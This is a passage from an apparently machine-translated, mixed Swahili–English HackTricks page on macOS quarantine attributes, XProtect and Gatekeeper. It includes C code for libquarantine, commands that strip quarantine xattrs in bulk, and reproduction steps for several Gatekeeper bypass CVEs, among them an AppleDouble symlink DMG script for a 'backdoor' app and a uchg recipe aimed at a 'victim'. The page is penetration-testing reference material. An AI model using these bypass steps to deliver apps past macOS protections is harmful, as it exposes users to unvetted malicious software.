enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, “xyz.hacktricks.qa”); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen(“thisisquarantined.txt”, “w+”); fprintf(fp, “Hello Quarantine\n”); fclose(fp);

return 0;

}

</details>

Na **ondoa** sifa hiyo kwa:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

Na pata faili zote zilizo kwenye karantini kwa:

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

Quarantine information is also stored in a central database managed by LaunchServices in ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 which allows the GUI to obtain data about the file origins. Moreover this can be overwritten by applications which might be interested in hiding its origins. Moreover, this can be done from LaunchServices APIS.

libquarantine.dylib

Maktaba hii inatoa kazi kadhaa zinazoruhusu kusimamia viwanja vya extended attribute.

The qtn_file_* APIs deal with file quarantine policies, the qtn_proc_* APIs are applied to processes (files created by the process). The unexported __qtn_syscall_quarantine* functions are the ones that applies the policies which calls mac_syscall with “Quarantine” as first argument which sends the requests to Quarantine.kext.

Quarantine.kext

The kernel extension is only available through the kernel cache on the system; however, you can download the Kernel Debug Kit from https://developer.apple.com/, which will contain a symbolicated version of the extension.

Kext hii ita-hook kupitia MACF kwa kupokea kwa simu kadhaa ili kushika matukio yote ya mzunguko wa maisha ya faili: Creation, opening, renaming, hard-linkning… hata setxattr ili kuizuia kuweka extended attribute com.apple.quarantine.

It also uses a couple of MIBs:

• security.mac.qtn.sandbox_enforce: Lazimisha karantini ndani ya Sandbox
• security.mac.qtn.user_approved_exec: Querantined procs can only execute approved files

Provenance xattr (Ventura and later)

macOS 13 Ventura ilianzisha mfumo tofauti wa provenance ambao unajazwa mara ya kwanza app iliyokarantiwa inaporuhusiwa kuendesha. Vifaa viwili vinaundwa:

• The com.apple.provenance xattr on the .app bundle directory (fixed-size binary value containing a primary key and flags).
• A row in the provenance_tracking table inside the ExecPolicy database at /var/db/SystemPolicyConfiguration/ExecPolicy/ storing the app’s cdhash and metadata.

Matumizi ya vitendo:

# Inspect provenance xattr (if present)
xattr -p com.apple.provenance /Applications/Some.app | hexdump -C

# Observe Gatekeeper/provenance events in real time
log stream --style syslog --predicate 'process == "syspolicyd"'

# Retrieve historical Gatekeeper decisions for a specific bundle
log show --last 2d --style syslog --predicate 'process == "syspolicyd" && eventMessage CONTAINS[cd] "GK scan"'

XProtect

XProtect ni kipengele kilichojengwa ndani cha anti-malware katika macOS. XProtect hukagua programu yoyote wakati inapoanzishwa kwa mara ya kwanza au inapobadilishwa dhidi ya hifadhidata yake ya malware inayojulikana na aina za faili zisizo salama. Unapopakua faili kupitia programu fulani, kama Safari, Mail, au Messages, XProtect huchunguza faili hiyo moja kwa moja. Ikiwa inafanana na malware yoyote inayojulikana katika hifadhidata yake, XProtect itazuia faili hiyo kuendeshwa na itakutaarifu kuhusu tishio hilo.

Hifadhidata ya XProtect inasasishwa mara kwa mara na Apple kwa ufafanuzi mpya wa malware, na masasisho haya yanapakuliwa na kusanikishwa kiotomatiki kwenye Mac yako. Hii inahakikisha kwamba XProtect kila wakati iko juu ya vitisho vipya vinavyojulikana.

Hata hivyo, ni muhimu kutambua kwamba XProtect si suluhisho la antivirus lenye vipengele kamili. Inakagua tu orodha maalum ya vitisho vinavyojulikana na haiendeshi on-access scanning kama programu nyingi za antivirus.

Unaweza kupata taarifa kuhusu sasisho la hivi karibuni la XProtect kwa kuendesha:

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

XProtect iko katika eneo lililolindwa na SIP kwa /Library/Apple/System/Library/CoreServices/XProtect.bundle na ndani ya bundle unaweza kupata taarifa ambazo XProtect inazitumia:

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist: Inaruhusu code zilizo na cdhash hizo kutumia legacy entitlements.
• XProtect.bundle/Contents/Resources/XProtect.meta.plist: Orodhesha plugins na extensions ambazo haziruhusiwi kupakia kupitia BundleID na TeamID au kuonyesha toleo la chini.
• XProtect.bundle/Contents/Resources/XProtect.yara: Sheria za Yara za kugundua malware.
• XProtect.bundle/Contents/Resources/gk.db: Database ya SQLite3 yenye hashes za applications zilizozuiliwa na TeamIDs.

Kumbuka kwamba kuna App nyingine katika /Library/Apple/System/Library/CoreServices/XProtect.app inayohusiana na XProtect ambayo haijihusishi na mchakato wa Gatekeeper.

XProtect Remediator: Katika macOS za kisasa, Apple hutoa on-demand scanners (XProtect Remediator) ambazo zinaendeshwa mara kwa mara kupitia launchd kugundua na kurekebisha familia za malware. Unaweza kuona skani hizi katika unified logs:

log show --last 2h --predicate 'subsystem == "com.apple.XProtectFramework" || category CONTAINS "XProtect"' --style syslog

Sio Gatekeeper

Caution

Kumbuka kwamba Gatekeeper haitekelezwii kila mara unapoendesha application; AppleMobileFileIntegrity (AMFI) itafanya tu kukagua saini za executable code wakati unaendesha app ambayo tayari imeendeshwa na kuthibitishwa na Gatekeeper.

Kwa hivyo, hapo awali ilikuwa inawezekana kuendesha app ili kuiweka kwenye cache ya Gatekeeper, kisha kubadilisha faili ambazo si executable za application (kama Electron asar au NIB files) na ikiwa hakuna kinga nyingine iliyopo, application ilitenda kazi ikiwa na nyongeza ziliolenga uharibifu.

Hata hivyo, sasa hii haiwezekani kwa sababu macOS inazuia kubadilisha faili ndani ya application bundles. Kwa hivyo, ukijaribu shambulio la Dirty NIB, utagundua kuwa hawezi kutumika tena kwa sababu baada ya kuendesha app ili kuiweka kwenye cache ya Gatekeeper, hautaweza kubadilisha bundle. Na kama utabadilisha kwa mfano jina la saraka ya Contents kuwa NotCon (kama ilivyosemwa kwenye exploit), na kisha uendeshe binary kuu ya app ili kuiweka kwenye cache ya Gatekeeper, itasababisha kosa na haitatekelezwa.

Gatekeeper Bypasses

Njia yoyote ya kupita Gatekeeper (kupata mtumiaji kupakua kitu na kukiweka endeshwa wakati Gatekeeper ingepaswa kukizuia) inachukuliwa kuwa hitilafu (vulnerability) katika macOS. Hizi ni baadhi ya CVE zilizotolewa kwa mbinu zilizowawezesha kupita Gatekeeper zamani:

CVE-2021-1810

Ilibainika kwamba ikiwa Archive Utility inatumiwa kwa extraction, faili zenye paths zenye zaidi ya herufi 886 hazipati com.apple.quarantine extended attribute. Hali hii kwa bahati mbaya inaruhusu faili hizo kupita ukaguzi wa usalama wa Gatekeeper.

Tazama ripoti ya awali kwa taarifa zaidi.

CVE-2021-30990

Wakati application inapotengenezwa kwa Automator, taarifa kuhusu kile inachohitaji kuendesha iko ndani ya application.app/Contents/document.wflow si kwenye executable. Executable ni binary ya Automator ya kawaida inayoitwa Automator Application Stub.

Kwa hivyo, unaweza kufanya application.app/Contents/MacOS/Automator\ Application\ Stub ikuonyeshe kwa symbolic link kwa Automator Application Stub nyingine ndani ya system na itatekeleza kile kilicho ndani ya document.wflow (script yako) bila kusababisha Gatekeeper kwa sababu executable halina quarantine xattr.

Mfano wa mahali kinachotarajiwa: /System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

Tazama ripoti ya awali kwa taarifa zaidi.

CVE-2022-22616

Katika bypass hii zip file ilitengenezwa kwa kuanza kusindika kutoka application.app/Contents badala ya application.app. Kwa hivyo, quarantine attr ilitumika kwa faili zote kutoka application.app/Contents lakini sio kwa application.app, ambayo ndiyo Gatekeeper ilikuwa inakagua, hivyo Gatekeeper iliwekwa kando kwa sababu wakati application.app ilipoanzishwa haikuwa na quarantine attribute.

zip -r test.app/Contents test.zip

Angalia original report kwa taarifa zaidi.

CVE-2022-32910

Hata kama components ni tofauti, exploitation ya vulnerability hii ni sawa sana na ile ya hapo awali. Katika kesi hii tutaunda Apple Archive kutoka application.app/Contents, kwa hivyo application.app won’t get the quarantine attr wakati inapotolewa na Archive Utility.

aa archive -d test.app/Contents -o test.app.aar

Angalia original report kwa maelezo zaidi.

CVE-2022-42821

ACL writeextattr inaweza kutumika kuzuia mtu yeyote kuandika sifa kwenye faili:

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

Zaidi ya hayo, AppleDouble file format hufanya nakala ya faili ikijumuisha ACEs zake.

Katika source code inawezekana kuona kwamba uwakilishi wa maandishi wa ACL ulihifadhiwa ndani ya xattr inayoitwa com.apple.acl.text utapewa kama ACL kwenye faili iliyotolewa. Kwa hivyo, ikiwa ulifinyiza programu ndani ya faili ya zip kwa AppleDouble file format na ACL ambayo inazuia xattr nyingine kuandikwa juu yake… quarantine xattr haikuwekwa kwenye programu:

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

Angalia original report kwa taarifa zaidi.

Kumbuka kwamba hii pia inaweza kutumika kwa kutumia AppleArchives:

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

Iligundulika kwamba Google Chrome wasn’t setting the quarantine attribute kwa faili zilizopakuliwa kutokana na baadhi ya matatizo ya ndani ya macOS.

CVE-2023-27951

AppleDouble file formats huhifadhi sifa za faili katika faili tofauti zinazoanza na ._; hili husaidia kunakili sifa za faili across macOS machines. Hata hivyo, iligunduliwa kwamba baada ya kuifungua AppleDouble file, faili inayozunguka na ._ wasn’t given the quarantine attribute.

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

Kutokana na uwezo wa kuunda faili ambayo haitawekwa quarantine attribute, ilikuwa inawezekana kuepuka Gatekeeper. Mbinu ilikuwa kuunda programu ya faili ya DMG kwa kutumia konvensheni ya majina ya AppleDouble (anza nayo ._) na kuunda faili inayoonekana kama sym link kwa faili hii iliyofichwa bila quarantine attribute.
Wakati dmg file inapoendeshwa, kwa kuwa haina quarantine attribute itaweza kuepuka Gatekeeper.

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

[CVE-2023-41067]

Bypass ya Gatekeeper iliyotatuliwa katika macOS Sonoma 14.0 iliwezesha apps zilizotengenezwa maalum kuendeshwa bila kuonyesha ombi la idhini. Maelezo yalifahamishwa kwa umma baada ya patch na tatizo lilitumiwa kwa uhalifu kabla ya kurekebishwa. Hakikisha Sonoma 14.0 au toleo jipya limewekwa.

[CVE-2024-27853]

Gatekeeper bypass katika macOS 14.4 (iliyotolewa Machi 2024) ilitokana na libarchive kushughulikia ZIPs zenye madhara, ikiruhusu apps kuepuka assessment. Sasisha hadi 14.4 au baadaye ambapo Apple ilitatua suala hilo.

CVE-2024-44128

An Automator Quick Action workflow iliyowekwa ndani ya app iliyopakuliwa inaweza kusababisha utekelezaji bila Gatekeeper assessment, kwa sababu workflows zilichukuliwa kama data na kuendeshwa na Automator helper nje ya njia ya kawaida ya notarization prompt. .app iliyotengenezwa bundling Quick Action inayotekeleza shell script (mfano, ndani ya Contents/PlugIns/*.workflow/Contents/document.wflow) inaweza hivyo kuendeshwa mara moja wakati wa kuanzisha. Apple iliongeza dialogo ya ziada ya ridhaa na kurekebisha njia ya assessment katika Ventura 13.7, Sonoma 14.7, na Sequoia 15.

Third‑party unarchivers mis‑propagating quarantine (2023–2024)

Taarifa kadhaa za udhaifu katika zana maarufu za extraction (mfano, The Unarchiver) zilisababisha faili zilizotolewa kutoka kwa archives kushindwa kupata xattr ya com.apple.quarantine, zikifungua fursa za Gatekeeper bypass. Daima tumia macOS Archive Utility au zana zilizosahihishwa (patched) unapotest, na thibitisha xattrs baada ya extraction.

uchg (from this talk)

• Create a directory containing an app.
• Add uchg to the app.
• Compress the app to a tar.gz file.
• Send the tar.gz file to a victim.
• The victim opens the tar.gz file and runs the app.
• Gatekeeper does not check the app.

Prevent Quarantine xattr

In an “.app” bundle if the quarantine xattr is not added to it, when executing it Gatekeeper won’t be triggered.

References

• Apple Platform Security: Kuhusu maudhui ya usalama ya macOS Sonoma 14.4 (inajumuisha CVE-2024-27853) – https://support.apple.com/en-us/HT214084
• Eclectic Light: Jinsi macOS sasa inafuatilia asili ya apps – https://eclecticlight.co/2023/05/10/how-macos-now-tracks-the-provenance-of-apps/
• Apple: Kuhusu maudhui ya usalama ya macOS Sonoma 14.7 / Ventura 13.7 (CVE-2024-44128) – https://support.apple.com/en-us/121234
• MacRumors: macOS 15 Sequoia removes the Control‑click “Open” Gatekeeper bypass – https://www.macrumors.com/2024/06/11/macos-sequoia-removes-open-anyway/

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.